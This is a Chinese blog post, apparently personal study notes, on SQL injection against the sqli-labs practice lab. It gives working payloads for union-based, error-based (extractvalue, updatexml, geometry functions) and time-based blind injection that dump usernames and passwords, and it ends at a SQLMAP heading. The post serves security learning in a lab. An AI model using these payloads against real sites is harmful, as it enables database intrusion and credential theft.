<!DOCTYPE html>
<html lang=en>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>sql注入 | Hexo</title>
  <meta name="description" content="一、MySQL数据库基本操作11.连接mysql:mysql -u root -p   12.创建数据库:create database images(database name);   13.查询所有数据库:show databases;   14.进入数据库:use security;   15.查询当前库所有表:show tables;   16.select 1,2,3;   123456">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入">
<meta property="og:url" content="http://example.com/2023/12/20/sql%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="一、MySQL数据库基本操作11.连接mysql:mysql -u root -p   12.创建数据库:create database images(database name);   13.查询所有数据库:show databases;   14.进入数据库:use security;   15.查询当前库所有表:show tables;   16.select 1,2,3;   123456">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223192958685.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223201825864.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223202052373.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223202204382.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223202813444.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223203535788.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223205838571.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223210003657.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223210206941.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223210546664.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223210912080.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223210939818.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223211738761.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223212056192.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223212118032.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223212139761.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224095306976.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223220157383.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223220242925.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223220646040.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223220842961.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223221104640.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223221309959.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223221457834.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224095240727.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224095647097.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224090957213.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224091358053.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224091821091.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224092609233.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224094638888.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224100035366.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224100315849.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231225111738144.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224104339653.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224104655566.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224105106529.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224105502568.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231225142426354.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224111055679.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224141039578.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224141158703.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224141949792.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224142312642.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224142642406.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224142921373.png">
<meta property="article:published_time" content="2023-12-20T10:27:48.000Z">
<meta property="article:modified_time" content="2023-12-25T06:24:47.442Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223192958685.png">
  <!-- Canonical links -->
  <link rel="canonical" href="http://example.com/2023/12/20/sql%E6%B3%A8%E5%85%A5/index.html">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 7.0.0"></head>


<body class="main-center theme-black# 主题颜色 theme-black theme-blue theme-green theme-purple" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/hkbijihxl" target="_blank">
          <img class="img-circle img-rotate" src="/images/avatar.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">hkbijihxl</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">汀花雨细，水树风闲，又是秋来。</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> changsha, China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="Search" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="Type something..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav menu-highlight">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">Home</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">Archives</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">Categories</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags">
            
            <i class="icon icon-tags"></i>
            
            <span class="menu-title">Tags</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-repository">
          <a href="/repository">
            
            <i class="icon icon-project"></i>
            
            <span class="menu-title">Repository</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-books">
          <a href="/books">
            
            <i class="icon icon-book-fill"></i>
            
            <span class="menu-title">Books</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-links">
          <a href="/links">
            
            <i class="icon icon-friendship"></i>
            
            <span class="menu-title">Links</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-about">
          <a href="/about">
            
            <i class="icon icon-cup-fill"></i>
            
            <span class="menu-title">About</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/hkbijihxl" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="https://weibo.com/u/7832381828" target="_blank" title="Weibo" data-toggle=tooltip data-placement=top><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="https://twitter.com/iwebued" target="_blank" title="Twitter" data-toggle=tooltip data-placement=top><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="https://www.behance.net/cofess" target="_blank" title="Behance" data-toggle=tooltip data-placement=top><i class="icon icon-behance"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">Board</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>欢迎交流与分享经验!</p>
            </div>
        </div>
    </div>
</div>

    
      

    
      

    
      
    
      
  <div class="widget">
    <h3 class="widget-title">Archive</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/12/">December 2023</a><span class="archive-list-count">11</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled no-thumbnail">
        
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2023/12/20/sql%E6%B3%A8%E5%85%A5/" class="title">sql注入</a>
              </p>
              <p class="item-date">
                <time datetime="2023-12-20T10:27:48.000Z" itemprop="datePublished">2023-12-20</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2023/12/16/PHP/" class="title">PHP</a>
              </p>
              <p class="item-date">
                <time datetime="2023-12-16T12:31:26.000Z" itemprop="datePublished">2023-12-16</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2023/12/11/vue/" class="title">vue</a>
              </p>
              <p class="item-date">
                <time datetime="2023-12-11T01:18:53.000Z" itemprop="datePublished">2023-12-11</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2023/12/10/WireShark%E3%80%81AhMyth%E4%BD%BF%E7%94%A8/" class="title">WireShark、AhMyth使用</a>
              </p>
              <p class="item-date">
                <time datetime="2023-12-10T05:33:28.000Z" itemprop="datePublished">2023-12-10</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2023/12/10/Proxifler/" class="title">Proxifler</a>
              </p>
              <p class="item-date">
                <time datetime="2023-12-10T03:24:41.000Z" itemprop="datePublished">2023-12-10</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
<main class="main" role="main">
  <div class="content">
  <article id="post-sql注入" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      sql注入
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2023/12/20/sql%E6%B3%A8%E5%85%A5/" class="article-date">
	  <time datetime="2023-12-20T10:27:48.000Z" itemprop="datePublished">2023-12-20</time>
	</a>
</span>
        
        

        

        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2023/12/20/sql%E6%B3%A8%E5%85%A5/#comments" class="article-comment-link">Comments</a></span>
        
      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <h2 id="一、MySQL数据库基本操作"><a href="#一、MySQL数据库基本操作" class="headerlink" title="一、MySQL数据库基本操作"></a>一、MySQL数据库基本操作</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1.连接mysql:mysql -u root -p</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223192958685.png" alt="image-20231223192958685"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">2.创建数据库:create database images(database name);</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223201825864.png" alt="image-20231223201825864"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">3.查询所有数据库:show databases;</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223202052373.png" alt="image-20231223202052373"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">4.进入数据库:use security;</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223202204382.png" alt="image-20231223202204382"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">5.查询当前库所有表:show tables;</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223202813444.png" alt="image-20231223202813444"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">6.select 1,2,3;</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223203535788.png" alt="image-20231223203535788"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">说明:</span><br><span class="line">1.information_schema是MySQL数据库系统中的一个系统数据库，它包含了关于数据库、表、列、索引、权限等方面的元数据信息。</span><br><span class="line">2.information_schma是从MySQL5.0版本开始引入的。</span><br><span class="line">3.SCHEMATA:存储数据库名</span><br><span class="line">  TABLES:存储表名</span><br><span class="line">  COLUMNS:存储字段名</span><br><span class="line">4.GROUP_CONCAT是MySQL中用于字符串拼接的聚合函数。它用于将每个分组中的值连接成一个字符串，并以逗号（默认分隔符）分隔。</span><br><span class="line">（小提示：mysql语句都是以分号结尾的！！！）</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">7.爆库:select 1,group_concat(SCHEMA_NAME),3 from information_schema.schemata;</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223205838571.png" alt="image-20231223205838571"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">8.爆表:select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema=database();</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223210003657.png" alt="image-20231223210003657"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">9.爆字段:select 1,group_concat(column_name) ,3 from information_schema.columns where table_name=&#x27;users&#x27; and table_schema=database();</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223210206941.png" alt="image-20231223210206941"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">10.爆数据:select group_concat(id,&quot;~&quot;,username,&quot;~&quot;,password) from users ;</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223210546664.png" alt="image-20231223210546664"></p>
<h2 id="二、前期准备"><a href="#二、前期准备" class="headerlink" title="二、前期准备"></a>二、前期准备</h2><p>1.在phpstudy的软件管理下载php5.5.9版本。</p>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223210912080.png" alt="image-20231223210912080"></p>
<p>2.应用，选择网站，点击管理，php版本，选择php5.5.9；然后在首页重启Apache和MySQL。</p>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223210939818.png" alt="image-20231223210939818"></p>
<p>3.添加Firefox插件（HackBar），打开火狐，点击右上角三条杠，选择扩展和主题。</p>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223211738761.png" alt="image-20231223211738761"></p>
<p>4.点击设置，选择从文件安装附加组件，选择文件，添加。</p>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223212056192.png" alt="image-20231223212056192"></p>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223212118032.png" alt="image-20231223212118032"></p>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223212139761.png" alt="image-20231223212139761"></p>
<h2 id="三、sqli"><a href="#三、sqli" class="headerlink" title="三、sqli"></a>三、sqli</h2><h4 id="1-union联合注入"><a href="#1-union联合注入" class="headerlink" title="1.union联合注入"></a>1.union联合注入</h4><blockquote>
<p>当使用id查询数据时，有回显可考虑使用union联合查询的方式</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224095306976.png" alt="image-20231224095306976"></p>
<p>①使用order by 猜测列数，报错就是超过列数。</p>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223220157383.png" alt="image-20231223220157383"></p>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223220242925.png" alt="image-20231223220242925"></p>
<p>②使用union联合查询，爆出显示位</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli/Less-1/? id=-1&#x27; union select 1,2,3 --+</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223220646040.png" alt="image-20231223220646040">③爆库</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli/Less-1/? id=-1&#x27; union select 1,database(),3 --+</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223220842961.png" alt="image-20231223220842961"></p>
<p>④爆表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli/Less-1/? id=-1&#x27; union  select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema=database()-- -</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223221104640.png" alt="image-20231223221104640"></p>
<p>⑤爆字段</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli/Less-1/? id=-1&#x27; union  select 1,group_concat(column_name) ,3 from information_schema.columns where table_name=&#x27;users&#x27; and table_schema=database();--+</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223221309959.png" alt="image-20231223221309959"></p>
<p>⑥爆数据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli/Less-1/? id=-1&#x27; union  select 1,group_concat(id,&quot;~&quot;,username,&quot;~&quot;,password),3 from users;-- -</span><br></pre></td></tr></table></figure>

<h4 id="2-报错注入"><a href="#2-报错注入" class="headerlink" title="2.报错注入"></a><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231223221457834.png" alt="image-20231223221457834">2.报错注入</h4><blockquote>
<p>当输入id查询，页面没回显，只有对错，union联合注入不可用，可以考虑报错注入。</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224095240727.png" alt="image-20231224095240727"></p>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224095647097.png" alt="image-20231224095647097"></p>
<h6 id="报错注入十大方法："><a href="#报错注入十大方法：" class="headerlink" title="报错注入十大方法："></a>报错注入十大方法：</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(1).(select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(2).(extractvalue(1,concat(0x7e,(select user()),0x7e)))</span><br></pre></td></tr></table></figure>

<blockquote>
<p>extractvalue()能查询字符串的最大长度为32</p>
</blockquote>
<p>当前用户：</p>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224090957213.png" alt="image-20231224090957213"></p>
<p>爆库：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli/Less-5/?%20id=1&#x27; and (extractvalue(1,concat(0x7e,(select database()),0x7e)))-- -</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224091358053.png" alt="image-20231224091358053"></p>
<p>爆表：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli/Less-5/?%20id=1&#x27; and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)))-- -</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224091821091.png" alt="image-20231224091821091"></p>
<p>爆字段：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli/Less-5/?%20id=1&#x27; and (extractvalue(1,concat(0x7e,(select group_concat(column_name)  from information_schema.columns where table_name=&#x27;users&#x27; and table_schema=database()),0x7e)))-- -</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224092609233.png" alt="image-20231224092609233"></p>
<p>爆数据：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli/Less-5/?%20id=1&#x27; and (extractvalue(1,concat(0x7e,(select group_concat(id,&quot;~&quot;,username,&quot;~&quot;,password) from users),0x7e)))-- -</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224094638888.png" alt="image-20231224094638888"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(3).(updatexml(1,concat(0x7e,(select user()),0x7e),1))</span><br></pre></td></tr></table></figure>

<blockquote>
<p>updatexml()能查询字符串的最大长度为32</p>
</blockquote>
<p>前三个比较常见，记住！！！</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(4).geometrycollection((select * from(select * from(select user())a)b))</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(5).multipoint((select * from(select * from(select user())a)b))</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(6).polygon((select * from(select * from(select user())a)b))</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(7).multipolygon((select * from(select * from(select user())a)b))</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(8).linestring((select * from(select * from(select user())a)b))</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(9).multilinestring((select * from(select * from(select user())a)b))</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(10).exp(~(select * from(select user())a))</span><br></pre></td></tr></table></figure>

<h4 id="3-盲注"><a href="#3-盲注" class="headerlink" title="3.盲注"></a>3.盲注</h4><blockquote>
<p>当输入id查询时，无回显，也不显示报错信息，可以考虑使用盲注</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224100035366.png" alt="image-20231224100035366"></p>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224100315849.png" alt="image-20231224100315849"></p>
<blockquote>
<p>爆库：</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231225111738144.png" alt="image-20231225111738144"></p>
<h4 id="4-睡眠"><a href="#4-睡眠" class="headerlink" title="4.睡眠"></a>4.睡眠</h4><blockquote>
<p>当以上方法都行不通时，可考虑睡眠(延时注入)，需要用到sleep()函数</p>
<p>如图所示，无论id值输入什么结果都是显示”You are in………..”</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224104339653.png" alt="image-20231224104339653"></p>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224104655566.png" alt="image-20231224104655566"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1.http://192.168.2.61/sqli/Less-9/?id=1&#x27; and If(ascii(substr(database(),1,1))=114,1,sleep(5))-- -</span><br><span class="line">库名第一个字符不等于114，睡眠5秒</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224105106529.png" alt="image-20231224105106529"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">2.http://192.168.2.61/sqli/Less-9/?id=1&#x27; and If(ascii(substr(database(),1,1))=114,1,BENCHMARK(5000000, SHA1(&#x27;Hello World&#x27;)))-- -</span><br><span class="line">库名第一个字符不等于114，睡眠5秒</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231224105502568.png" alt="image-20231224105502568"></p>
<h6 id="时间盲注脚本："><a href="#时间盲注脚本：" class="headerlink" title="时间盲注脚本："></a>时间盲注脚本：</h6><blockquote>
<p>爆库：</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/hkbijihxl/PicGo/main/image-20231225142426354.png" alt="image-20231225142426354"></p>
<h4 id="5-SQLMAP"><a href="#5-SQLMAP" class="headerlink" title="5.SQLMAP"></a>5.SQLMAP</h4><blockquote>
